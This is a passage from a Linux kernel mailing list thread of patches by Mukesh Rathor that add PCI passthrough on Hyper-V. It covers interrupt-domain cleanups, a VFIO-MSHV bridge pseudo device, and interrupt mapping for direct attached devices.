input = *this_cpu_ptr(hyperv_pcpu_input_arg); memset(input, 0, sizeof(*input)); - intr_entry = &input->interrupt_entry; input->partition_id = hv_current_partition_id; input->device_id = id; - *intr_entry = *old_entry; + input->interrupt_entry = *irq_entry; status = hv_do_hypercall(HVCALL_UNMAP_DEVICE_INTERRUPT, input, NULL); local_irq_restore(flags); @@ -115,67 +112,71 @@ static int get_rid_cb(struct pci_dev *pdev, u16 alias, void *data) return 0; } -static union hv_device_id hv_build_pci_dev_id(struct pci_dev *dev) +static union hv_device_id hv_build_devid_type_pci(struct pci_dev *pdev) { - union hv_device_id dev_id; + int pos; + union hv_device_id hv_devid; struct rid_data data = { .bridge = NULL, - .rid = PCI_DEVID(dev->bus->number, dev->devfn) + .rid = PCI_DEVID(pdev->bus->number, pdev->devfn) }; - pci_for_each_dma_alias(dev, get_rid_cb, &data); + pci_for_each_dma_alias(pdev, get_rid_cb, &data); - dev_id.as_uint64 = 0; - dev_id.device_type = HV_DEVICE_TYPE_PCI; - dev_id.pci.segment = pci_domain_nr(dev->bus); + hv_devid.as_uint64 = 0; + hv_devid.device_type = HV_DEVICE_TYPE_PCI; + hv_devid.pci.segment = pci_domain_nr(pdev->bus); - dev_id.pci.bdf.bus = PCI_BUS_NUM(data.rid); - dev_id.pci.bdf.device = PCI_SLOT(data.rid); - dev_id.pci.bdf.function = PCI_FUNC(data.rid); - dev_id.pci.source_shadow = HV_SOURCE_SHADOW_NONE; + hv_devid.pci.bdf.bus = PCI_BUS_NUM(data.rid); + hv_devid.pci.bdf.device = PCI_SLOT(data.rid); + hv_devid.pci.bdf.function = PCI_FUNC(data.rid); + hv_devid.pci.source_shadow = HV_SOURCE_SHADOW_NONE; - if (data.bridge) { - int pos; + if (data.bridge == NULL) + goto out; - /* - * Microsoft Hypervisor requires a bus range when the bridge is - * running in PCI-X mode. - * - * To distinguish conventional vs PCI-X bridge, we can check - * the bridge's PCI-X Secondary Status Register, Secondary Bus - * Mode and Frequency bits. See PCI Express to PCI/PCI-X Bridge - * Specification Revision 1.0 5.2.2.1.3. 
- * - * Value zero means it is in conventional mode, otherwise it is - * in PCI-X mode. - */ + /* + * Microsoft Hypervisor requires a bus range when the bridge is + * running in PCI-X mode. + * + * To distinguish conventional vs PCI-X bridge, we can check + * the bridge's PCI-X Secondary Status Register, Secondary Bus + * Mode and Frequency bits. See PCI Express to PCI/PCI-X Bridge + * Specification Revision 1.0 5.2.2.1.3. + * + * Value zero means it is in conventional mode, otherwise it is + * in PCI-X mode. + */ - pos = pci_find_capability(data.bridge, PCI_CAP_ID_PCIX); - if (pos) { - u16 status; + pos = pci_find_capability(data.bridge, PCI_CAP_ID_PCIX); + if (pos) { + u16 status; - pci_read_config_word(data.bridge, pos + - PCI_X_BRIDGE_SSTATUS, &status); + pci_read_config_word(data.bridge, pos + PCI_X_BRIDGE_SSTATUS, + &status); - if (status & PCI_X_SSTATUS_FREQ) { - /* Non-zero, PCI-X mode */ - u8 sec_bus, sub_bus; + if (status & PCI_X_SSTATUS_FREQ) { + /* Non-zero, PCI-X mode */ + u8 sec_bus, sub_bus; - dev_id.pci.source_shadow = HV_SOURCE_SHADOW_BRIDGE_BUS_RANGE; + hv_devid.pci.source_shadow = + HV_SOURCE_SHADOW_BRIDGE_BUS_RANGE; - pci_read_config_byte(data.bridge, PCI_SECONDARY_BUS, &sec_bus); - dev_id.pci.shadow_bus_range.secondary_bus = sec_bus; - pci_read_config_byte(data.bridge, PCI_SUBORDINATE_BUS, &sub_bus); - dev_id.pci.shadow_bus_range.subordinate_bus = sub_bus; - } + pci_read_config_byte(data.bridge, PCI_SECONDARY_BUS, + &sec_bus); + hv_devid.pci.shadow_bus_range.secondary_bus = sec_bus; + pci_read_config_byte(data.bridge, PCI_SUBORDINATE_BUS, + &sub_bus); + hv_devid.pci.shadow_bus_range.subordinate_bus = sub_bus; } } - return dev_id; +out: + return hv_devid; } -/** - * hv_map_msi_interrupt() - "Map" the MSI IRQ in the hypervisor. +/* + * hv_map_msi_interrupt() - Map the MSI IRQ in the hypervisor. 
* @data: Describes the IRQ * @out_entry: Hypervisor (MSI) interrupt entry (can be NULL) * @@ -188,22 +189,23 @@ int hv_map_msi_interrupt(struct irq_data *data, { struct irq_cfg *cfg = irqd_cfg(data); struct hv_interrupt_entry dummy; - union hv_device_id device_id; + union hv_device_id hv_devid; struct msi_desc *msidesc; - struct pci_dev *dev; + struct pci_dev *pdev; int cpu; msidesc = irq_data_get_msi_desc(data); - dev = msi_desc_to_pci_dev(msidesc); - device_id = hv_build_pci_dev_id(dev); + pdev = msi_desc_to_pci_dev(msidesc); + hv_devid = hv_build_devid_type_pci(pdev); cpu = cpumask_first(irq_data_get_effective_affinity_mask(data)); - return hv_map_interrupt(device_id, false, cpu, cfg->vector, + return hv_map_interrupt(hv_devid, false, cpu, cfg->vector, out_entry ? out_entry : &dummy); } EXPORT_SYMBOL_GPL(hv_map_msi_interrupt); -static inline void entry_to_msi_msg(struct hv_interrupt_entry *entry, struct msi_msg *msg) +static void entry_to_msi_msg(struct hv_interrupt_entry *entry, + struct msi_msg *msg) { /* High address is always 0 */ msg->address_hi = 0; @@ -211,17 +213,19 @@ static inline void entry_to_msi_msg(struct hv_interrupt_entry *entry, struct msi msg->data = entry->msi_entry.data.as_uint32; } -static int hv_unmap_msi_interrupt(struct pci_dev *dev, struct hv_interrupt_entry *old_entry); +static int hv_unmap_msi_interrupt(struct pci_dev *pdev, + struct hv_interrupt_entry *irq_entry); + static void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) { struct hv_interrupt_entry *stored_entry; struct irq_cfg *cfg = irqd_cfg(data); struct msi_desc *msidesc; - struct pci_dev *dev; + struct pci_dev *pdev; int ret; msidesc = irq_data_get_msi_desc(data); - dev = msi_desc_to_pci_dev(msidesc); + pdev = msi_desc_to_pci_dev(msidesc); if (!cfg) { pr_debug("%s: cfg is NULL", __func__); @@ -240,7 +244,7 @@ static void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) stored_entry = data->chip_data; data->chip_data = NULL; - ret = 
hv_unmap_msi_interrupt(dev, stored_entry); + ret = hv_unmap_msi_interrupt(pdev, stored_entry); kfree(stored_entry); @@ -249,10 +253,8 @@ static void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) } stored_entry = kzalloc(sizeof(*stored_entry), GFP_ATOMIC); - if (!stored_entry) { - pr_debug("%s: failed to allocate chip data\n", __func__); + if (!stored_entry) return; - } ret = hv_map_msi_interrupt(data, stored_entry); if (ret) { @@ -262,18 +264,21 @@ static void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) data->chip_data = stored_entry; entry_to_msi_msg(data->chip_data, msg); - - return; } -static int hv_unmap_msi_interrupt(struct pci_dev *dev, struct hv_interrupt_entry *old_entry) +static int hv_unmap_msi_interrupt(struct pci_dev *pdev, + struct hv_interrupt_entry *irq_entry) { - return hv_unmap_interrupt(hv_build_pci_dev_id(dev).as_uint64, old_entry); + union hv_device_id hv_devid; + + hv_devid = hv_build_devid_type_pci(pdev); + return hv_unmap_interrupt(hv_devid.as_uint64, irq_entry); } -static void hv_teardown_msi_irq(struct pci_dev *dev, struct irq_data *irqd) +/* NB: during map, hv_interrupt_entry is saved via data->chip_data */ +static void hv_teardown_msi_irq(struct pci_dev *pdev, struct irq_data *irqd) { - struct hv_interrupt_entry old_entry; + struct hv_interrupt_entry irq_entry; struct msi_msg msg; if (!irqd->chip_data) { @@ -281,13 +286,13 @@ static void hv_teardown_msi_irq(struct pci_dev *dev, struct irq_data *irqd) return; } - old_entry = *(struct hv_interrupt_entry *)irqd->chip_data; - entry_to_msi_msg(&old_entry, &msg); + irq_entry = *(struct hv_interrupt_entry *)irqd->chip_data; + entry_to_msi_msg(&irq_entry, &msg); kfree(irqd->chip_data); irqd->chip_data = NULL; - (void)hv_unmap_msi_interrupt(dev, &old_entry); + (void)hv_unmap_msi_interrupt(pdev, &irq_entry); } /* @@ -302,7 +307,8 @@ static struct irq_chip hv_pci_msi_controller = { }; static bool hv_init_dev_msi_info(struct device *dev, struct irq_domain 
*domain, - struct irq_domain *real_parent, struct msi_domain_info *info) + struct irq_domain *real_parent, + struct msi_domain_info *info) { struct irq_chip *chip = info->chip; @@ -317,7 +323,8 @@ static bool hv_init_dev_msi_info(struct device *dev, struct irq_domain *domain, } #define HV_MSI_FLAGS_SUPPORTED (MSI_GENERIC_FLAGS_MASK | MSI_FLAG_PCI_MSIX) -#define HV_MSI_FLAGS_REQUIRED (MSI_FLAG_USE_DEF_DOM_OPS | MSI_FLAG_USE_DEF_CHIP_OPS) +#define HV_MSI_FLAGS_REQUIRED (MSI_FLAG_USE_DEF_DOM_OPS | \ + MSI_FLAG_USE_DEF_CHIP_OPS) static struct msi_parent_ops hv_msi_parent_ops = { .supported_flags = HV_MSI_FLAGS_SUPPORTED, @@ -329,14 +336,13 @@ static struct msi_parent_ops hv_msi_parent_ops = { .init_dev_msi_info = hv_init_dev_msi_info, }; -static int hv_msi_domain_alloc(struct irq_domain *d, unsigned int virq, unsigned int nr_irqs, - void *arg) +static int hv_msi_domain_alloc(struct irq_domain *d, unsigned int virq, + unsigned int nr_irqs, void *arg) { /* - * TODO: The allocation bits of hv_irq_compose_msi_msg(), i.e. everything except - * entry_to_msi_msg() should be in here. + * TODO: The allocation bits of hv_irq_compose_msi_msg(), i.e. + * everything except entry_to_msi_msg() should be in here. 
*/ - int ret; ret = irq_domain_alloc_irqs_parent(d, virq, nr_irqs, arg); @@ -344,13 +350,15 @@ static int hv_msi_domain_alloc(struct irq_domain *d, unsigned int virq, unsigned return ret; for (int i = 0; i < nr_irqs; ++i) { - irq_domain_set_info(d, virq + i, 0, &hv_pci_msi_controller, NULL, - handle_edge_irq, NULL, "edge"); + irq_domain_set_info(d, virq + i, 0, &hv_pci_msi_controller, + NULL, handle_edge_irq, NULL, "edge"); } + return 0; } -static void hv_msi_domain_free(struct irq_domain *d, unsigned int virq, unsigned int nr_irqs) +static void hv_msi_domain_free(struct irq_domain *d, unsigned int virq, + unsigned int nr_irqs) { for (int i = 0; i < nr_irqs; ++i) { struct irq_data *irqd = irq_domain_get_irq_data(d, virq); @@ -362,6 +370,7 @@ static void hv_msi_domain_free(struct irq_domain *d, unsigned int virq, unsigned hv_teardown_msi_irq(to_pci_dev(desc->dev), irqd); } + irq_domain_free_irqs_top(d, virq, nr_irqs); } @@ -394,25 +403,25 @@ struct irq_domain * __init hv_create_pci_msi_domain(void) int hv_unmap_ioapic_interrupt(int ioapic_id, struct hv_interrupt_entry *entry) { - union hv_device_id device_id; + union hv_device_id hv_devid; - device_id.as_uint64 = 0; - device_id.device_type = HV_DEVICE_TYPE_IOAPIC; - device_id.ioapic.ioapic_id = (u8)ioapic_id; + hv_devid.as_uint64 = 0; + hv_devid.device_type = HV_DEVICE_TYPE_IOAPIC; + hv_devid.ioapic.ioapic_id = (u8)ioapic_id; - return hv_unmap_interrupt(device_id.as_uint64, entry); + return hv_unmap_interrupt(hv_devid.as_uint64, entry); } EXPORT_SYMBOL_GPL(hv_unmap_ioapic_interrupt); int hv_map_ioapic_interrupt(int ioapic_id, bool level, int cpu, int vector, struct hv_interrupt_entry *entry) { - union hv_device_id device_id; + union hv_device_id hv_devid; - device_id.as_uint64 = 0; - device_id.device_type = HV_DEVICE_TYPE_IOAPIC; - device_id.ioapic.ioapic_id = (u8)ioapic_id; + hv_devid.as_uint64 = 0; + hv_devid.device_type = HV_DEVICE_TYPE_IOAPIC; + hv_devid.ioapic.ioapic_id = (u8)ioapic_id; - return 
hv_map_interrupt(device_id, level, cpu, vector, entry); + return hv_map_interrupt(hv_devid, level, cpu, vector, entry); } EXPORT_SYMBOL_GPL(hv_map_ioapic_interrupt); -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:17 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on the Microsoft Hyper-V hypervisor. This support is made to fit within the workings of the VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in the VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor version 48. Qemu support of MSHV is in the works, and it will be extended to include PCI passthru and SR-IOV support in the near future. 
Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> Add a new file to implement VFIO-MSHV bridge pseudo device. These functions are called in the VFIO framework, and credits to kvm/vfio.c as this file was adapted from it. Original author: Wei Liu <wei.liu@kernel.org> (Slightly modified from the original version). Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/hv/Makefile | 3 +- drivers/hv/mshv_vfio.c | 210 +++++++++++++++++++++++++++++++++++++++++ 2 files changed, 212 insertions(+), 1 deletion(-) create mode 100644 drivers/hv/mshv_vfio.c diff --git a/drivers/hv/Makefile b/drivers/hv/Makefile index a49f93c2d245..eae003c4cb8f 100644 --- a/drivers/hv/Makefile +++ b/drivers/hv/Makefile @@ -14,7 +14,8 @@ hv_vmbus-y := vmbus_drv.o \ hv_vmbus-$(CONFIG_HYPERV_TESTING) += hv_debugfs.o hv_utils-y := hv_util.o hv_kvp.o hv_snapshot.o hv_utils_transport.o mshv_root-y := mshv_root_main.o mshv_synic.o mshv_eventfd.o mshv_irq.o \ - mshv_root_hv_call.o mshv_portid_table.o mshv_regions.o + mshv_root_hv_call.o mshv_portid_table.o mshv_regions.o \ + mshv_vfio.o mshv_vtl-y := mshv_vtl_main.o # Code that must be built-in diff --git a/drivers/hv/mshv_vfio.c b/drivers/hv/mshv_vfio.c new file mode 100644 index 000000000000..6ea4d99a3bd2 --- /dev/null +++ b/drivers/hv/mshv_vfio.c @@ -0,0 +1,210 @@ +// SPDX-License-Identifier: GPL-2.0-only +/* + * VFIO-MSHV bridge pseudo device + * + * Heavily inspired by the VFIO-KVM bridge pseudo device. 
+ */ +#include <linux/errno.h> +#include <linux/file.h> +#include <linux/list.h> +#include <linux/module.h> +#include <linux/mutex.h> +#include <linux/slab.h> +#include <linux/vfio.h> + +#include "mshv.h" +#include "mshv_root.h" + +struct mshv_vfio_file { + struct list_head node; + struct file *file; /* list of struct mshv_vfio_file */ +}; + +struct mshv_vfio { + struct list_head file_list; + struct mutex lock; +}; + +static bool mshv_vfio_file_is_valid(struct file *file) +{ + bool (*fn)(struct file *file); + bool ret; + + fn = symbol_get(vfio_file_is_valid); + if (!fn) + return false; + + ret = fn(file); + + symbol_put(vfio_file_is_valid); + + return ret; +} + +static long mshv_vfio_file_add(struct mshv_device *mshvdev, unsigned int fd) +{ + struct mshv_vfio *mshv_vfio = mshvdev->device_private; + struct mshv_vfio_file *mvf; + struct file *filp; + long ret = 0; + + filp = fget(fd); + if (!filp) + return -EBADF; + + /* Ensure the FD is a vfio FD. */ + if (!mshv_vfio_file_is_valid(filp)) { + ret = -EINVAL; + goto out_fput; + } + + mutex_lock(&mshv_vfio->lock); + + list_for_each_entry(mvf, &mshv_vfio->file_list, node) { + if (mvf->file == filp) { + ret = -EEXIST; + goto out_unlock; + } + } + + mvf = kzalloc(sizeof(*mvf), GFP_KERNEL_ACCOUNT); + if (!mvf) { + ret = -ENOMEM; + goto out_unlock; + } + + mvf->file = get_file(filp); + list_add_tail(&mvf->node, &mshv_vfio->file_list); + +out_unlock: + mutex_unlock(&mshv_vfio->lock); +out_fput: + fput(filp); + return ret; +} + +static long mshv_vfio_file_del(struct mshv_device *mshvdev, unsigned int fd) +{ + struct mshv_vfio *mshv_vfio = mshvdev->device_private; + struct mshv_vfio_file *mvf; + long ret; + + CLASS(fd, f)(fd); + + if (fd_empty(f)) + return -EBADF; + + ret = -ENOENT; + mutex_lock(&mshv_vfio->lock); + + list_for_each_entry(mvf, &mshv_vfio->file_list, node) { + if (mvf->file != fd_file(f)) + continue; + + list_del(&mvf->node); + fput(mvf->file); + kfree(mvf); + ret = 0; + break; + } + + 
mutex_unlock(&mshv_vfio->lock); + return ret; +} + +static long mshv_vfio_set_file(struct mshv_device *mshvdev, long attr, + void __user *arg) +{ + int32_t __user *argp = arg; + int32_t fd; + + switch (attr) { + case MSHV_DEV_VFIO_FILE_ADD: + if (get_user(fd, argp)) + return -EFAULT; + return mshv_vfio_file_add(mshvdev, fd); + + case MSHV_DEV_VFIO_FILE_DEL: + if (get_user(fd, argp)) + return -EFAULT; + return mshv_vfio_file_del(mshvdev, fd); + } + + return -ENXIO; +} + +static long mshv_vfio_set_attr(struct mshv_device *mshvdev, + struct mshv_device_attr *attr) +{ + switch (attr->group) { + case MSHV_DEV_VFIO_FILE: + return mshv_vfio_set_file(mshvdev, attr->attr, + u64_to_user_ptr(attr->addr)); + } + + return -ENXIO; +} + +static long mshv_vfio_has_attr(struct mshv_device *mshvdev, + struct mshv_device_attr *attr) +{ + switch (attr->group) { + case MSHV_DEV_VFIO_FILE: + switch (attr->attr) { + case MSHV_DEV_VFIO_FILE_ADD: + case MSHV_DEV_VFIO_FILE_DEL: + return 0; + } + + break; + } + + return -ENXIO; +} + +static long mshv_vfio_create_device(struct mshv_device *mshvdev, u32 type) +{ + struct mshv_device *tmp; + struct mshv_vfio *mshv_vfio; + + /* Only one VFIO "device" per VM */ + hlist_for_each_entry(tmp, &mshvdev->device_pt->pt_devices, + device_ptnode) + if (tmp->device_ops == &mshv_vfio_device_ops) + return -EBUSY; + + mshv_vfio = kzalloc(sizeof(*mshv_vfio), GFP_KERNEL_ACCOUNT); + if (mshv_vfio == NULL) + return -ENOMEM; + + INIT_LIST_HEAD(&mshv_vfio->file_list); + mutex_init(&mshv_vfio->lock); + + mshvdev->device_private = mshv_vfio; + + return 0; +} + +/* This is called from mshv_device_fop_release() */ +static void mshv_vfio_release_device(struct mshv_device *mshvdev) +{ + struct mshv_vfio *mv = mshvdev->device_private; + struct mshv_vfio_file *mvf, *tmp; + + list_for_each_entry_safe(mvf, tmp, &mv->file_list, node) { + fput(mvf->file); + list_del(&mvf->node); + kfree(mvf); + } + + kfree(mv); + kfree(mshvdev); +} + +struct mshv_device_ops 
mshv_vfio_device_ops = { + .device_name = "mshv-vfio", + .device_create = mshv_vfio_create_device, + .device_release = mshv_vfio_release_device, + .device_set_attr = mshv_vfio_set_attr, + .device_has_attr = mshv_vfio_has_attr, +}; -- 2.51.2.vfs.0.1
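The add/del semantics above (MSHV_DEV_VFIO_FILE_ADD rejects a file already on the list with -EEXIST; MSHV_DEV_VFIO_FILE_DEL returns -ENOENT for a file that was never added) can be modeled in a userspace-runnable miniature. This is an illustrative toy only: a singly linked list of ints stands in for the kernel's mutex-protected list of struct file pointers, and the names here are made up for the sketch.

```c
#include <assert.h>
#include <errno.h>
#include <stdlib.h>

/* Toy stand-in for struct mshv_vfio_file: one node per tracked fd. */
struct vf_node { struct vf_node *next; int fd; };

static struct vf_node *vf_list;

/* Model of mshv_vfio_file_add(): scan for a duplicate before appending. */
static int model_file_add(int fd)
{
	struct vf_node *n;

	for (n = vf_list; n; n = n->next)
		if (n->fd == fd)
			return -EEXIST;	/* already tracked */

	n = calloc(1, sizeof(*n));
	if (!n)
		return -ENOMEM;

	n->fd = fd;
	n->next = vf_list;
	vf_list = n;
	return 0;
}

/* Model of mshv_vfio_file_del(): unlink and free the match, if any. */
static int model_file_del(int fd)
{
	struct vf_node **pp, *n;

	for (pp = &vf_list; (n = *pp); pp = &n->next) {
		if (n->fd != fd)
			continue;
		*pp = n->next;
		free(n);
		return 0;
	}

	return -ENOENT;	/* not on the list */
}
```

A VMM would hit the same return codes by passing the same VFIO fd to FILE_ADD twice, or FILE_DEL for an fd it never registered.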
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:21 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
From: Mukesh Rathor <mrathor@linux.microsoft.com> As mentioned previously, a direct attached device must be referenced via the logical device id that is formed in the initial attach hypercall. The interrupt mapping paths for direct attached devices are almost the same, except that logical device ids must be used instead of the PCI device ids. L1VH only supports direct attach for passing thru devices to its guests, and devices on L1VH are VMBus based. However, the interrupts are mapped via the map interrupt hypercall and not the traditional method of VMBus messages. The partition id for the relevant hypercalls is tricky. This is because a device could be moving from root to guest and then back to the root. In the case of L1VH, it could be moving from the system host to the L1VH root to a guest, then back to the L1VH root. So it is carefully chosen by keeping track of whether the call is on behalf of a VMM process, whether the device is an attached device (as opposed to mapped), and whether we are in an L1VH root/parent. If it is a VMM process, we assume the call is on behalf of a guest. Otherwise, the device is being attached or detached during boot or shutdown of the privileged partition. Lastly, a dummy cpu and vector are used to map the interrupt for a direct attached device. This is because, once a device is marked for direct attach, the hypervisor will not let any interrupts be mapped to the host. So the interrupt is mapped to a dummy guest cpu and vector, and is then retargeted to the correct guest cpu and vector during guest boot via the retarget paths. 
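The partition-id choice described above reduces to a small decision function. The sketch below is a userspace-runnable model of that logic; the function name and parameters are invented for illustration and are not the series' actual helpers (in the series the ids come from hypervisor state such as hv_current_partition_id and hv_iommu_get_curr_partid()).

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/*
 * Model of the target-partition decision: a VMM process operating on a
 * direct attached device is assumed to act on behalf of its guest
 * partition; every other case (e.g. attach/detach during boot or
 * shutdown of the privileged partition itself, or a device that sits on
 * the L1VH root and is not passed thru) uses the current partition id.
 */
static uint64_t choose_irq_partid(bool vmm_process, bool attached_dev,
				  uint64_t guest_partid, uint64_t curr_partid)
{
	if (vmm_process && attached_dev)
		return guest_partid;

	return curr_partid;
}
```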
Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- arch/arm64/include/asm/mshyperv.h | 15 +++++ arch/x86/hyperv/irqdomain.c | 57 +++++++++++++----- arch/x86/include/asm/mshyperv.h | 4 ++ drivers/pci/controller/pci-hyperv.c | 91 +++++++++++++++++++++++++---- 4 files changed, 142 insertions(+), 25 deletions(-) diff --git a/arch/arm64/include/asm/mshyperv.h b/arch/arm64/include/asm/mshyperv.h index b721d3134ab6..27da480f94f6 100644 --- a/arch/arm64/include/asm/mshyperv.h +++ b/arch/arm64/include/asm/mshyperv.h @@ -53,6 +53,21 @@ static inline u64 hv_get_non_nested_msr(unsigned int reg) return hv_get_msr(reg); } +struct irq_data; +struct msi_msg; +struct pci_dev; +static inline void hv_irq_compose_msi_msg(struct irq_data *data, + struct msi_msg *msg) {}; +static inline int hv_unmap_msi_interrupt(struct pci_dev *pdev, + struct hv_interrupt_entry *hvirqe) +{ + return -EOPNOTSUPP; +} +static inline bool hv_pcidev_is_attached_dev(struct pci_dev *pdev) +{ + return false; +} + /* SMCCC hypercall parameters */ #define HV_SMCCC_FUNC_NUMBER 1 #define HV_FUNC_ID ARM_SMCCC_CALL_VAL( \ diff --git a/arch/x86/hyperv/irqdomain.c b/arch/x86/hyperv/irqdomain.c index 33017aa0caa4..e6eb457f791e 100644 --- a/arch/x86/hyperv/irqdomain.c +++ b/arch/x86/hyperv/irqdomain.c @@ -13,6 +13,16 @@ #include <linux/irqchip/irq-msi-lib.h> #include <asm/mshyperv.h> +/* + * For direct attached devices (which use logical device ids), hypervisor will + * not allow mappings to host. But VFIO needs to bind the interrupt at the very + * start before the guest cpu/vector is known. So we use dummy cpu and vector + * to bind in such case, and later when the guest starts, retarget will move it + * to correct guest cpu and vector. 
+ */ +#define HV_DDA_DUMMY_CPU 0 +#define HV_DDA_DUMMY_VECTOR 32 + static u64 hv_map_interrupt_hcall(u64 ptid, union hv_device_id hv_devid, bool level, int cpu, int vector, struct hv_interrupt_entry *ret_entry) @@ -24,6 +34,11 @@ static u64 hv_map_interrupt_hcall(u64 ptid, union hv_device_id hv_devid, u64 status; int nr_bank, var_size; + if (hv_devid.device_type == HV_DEVICE_TYPE_LOGICAL) { + cpu = HV_DDA_DUMMY_CPU; + vector = HV_DDA_DUMMY_VECTOR; + } + local_irq_save(flags); input = *this_cpu_ptr(hyperv_pcpu_input_arg); @@ -95,7 +110,8 @@ static int hv_map_interrupt(u64 ptid, union hv_device_id device_id, bool level, return hv_result_to_errno(status); } -static int hv_unmap_interrupt(u64 id, struct hv_interrupt_entry *irq_entry) +static int hv_unmap_interrupt(union hv_device_id hv_devid, + struct hv_interrupt_entry *irq_entry) { unsigned long flags; struct hv_input_unmap_device_interrupt *input; @@ -103,10 +119,14 @@ static int hv_unmap_interrupt(u64 id, struct hv_interrupt_entry *irq_entry) local_irq_save(flags); input = *this_cpu_ptr(hyperv_pcpu_input_arg); - memset(input, 0, sizeof(*input)); - input->partition_id = hv_current_partition_id; - input->device_id = id; + + if (hv_devid.device_type == HV_DEVICE_TYPE_LOGICAL) + input->partition_id = hv_iommu_get_curr_partid(); + else + input->partition_id = hv_current_partition_id; + + input->device_id = hv_devid.as_uint64; input->interrupt_entry = *irq_entry; status = hv_do_hypercall(HVCALL_UNMAP_DEVICE_INTERRUPT, input, NULL); @@ -263,6 +283,7 @@ static u64 hv_build_irq_devid(struct pci_dev *pdev) int hv_map_msi_interrupt(struct irq_data *data, struct hv_interrupt_entry *out_entry) { + u64 ptid; struct irq_cfg *cfg = irqd_cfg(data); struct hv_interrupt_entry dummy; union hv_device_id hv_devid; @@ -275,8 +296,17 @@ int hv_map_msi_interrupt(struct irq_data *data, hv_devid.as_uint64 = hv_build_irq_devid(pdev); cpu = cpumask_first(irq_data_get_effective_affinity_mask(data)); - return 
hv_map_interrupt(hv_current_partition_id, hv_devid, false, cpu, - cfg->vector, out_entry ? out_entry : &dummy); + if (hv_devid.device_type == HV_DEVICE_TYPE_LOGICAL) + if (hv_pcidev_is_attached_dev(pdev)) + ptid = hv_iommu_get_curr_partid(); + else + /* Device actually on l1vh root, not passthru'd to vm */ + ptid = hv_current_partition_id; + else + ptid = hv_current_partition_id; + + return hv_map_interrupt(ptid, hv_devid, false, cpu, cfg->vector, + out_entry ? out_entry : &dummy); } EXPORT_SYMBOL_GPL(hv_map_msi_interrupt); @@ -289,10 +319,7 @@ static void entry_to_msi_msg(struct hv_interrupt_entry *entry, msg->data = entry->msi_entry.data.as_uint32; } -static int hv_unmap_msi_interrupt(struct pci_dev *pdev, - struct hv_interrupt_entry *irq_entry); - -static void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) +void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) { struct hv_interrupt_entry *stored_entry; struct irq_cfg *cfg = irqd_cfg(data); @@ -341,16 +368,18 @@ static void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) data->chip_data = stored_entry; entry_to_msi_msg(data->chip_data, msg); } +EXPORT_SYMBOL_GPL(hv_irq_compose_msi_msg); -static int hv_unmap_msi_interrupt(struct pci_dev *pdev, - struct hv_interrupt_entry *irq_entry) +int hv_unmap_msi_interrupt(struct pci_dev *pdev, + struct hv_interrupt_entry *irq_entry) { union hv_device_id hv_devid; hv_devid.as_uint64 = hv_build_irq_devid(pdev); - return hv_unmap_interrupt(hv_devid.as_uint64, irq_entry); + return hv_unmap_interrupt(hv_devid, irq_entry); } +EXPORT_SYMBOL_GPL(hv_unmap_msi_interrupt); /* NB: during map, hv_interrupt_entry is saved via data->chip_data */ static void hv_teardown_msi_irq(struct pci_dev *pdev, struct irq_data 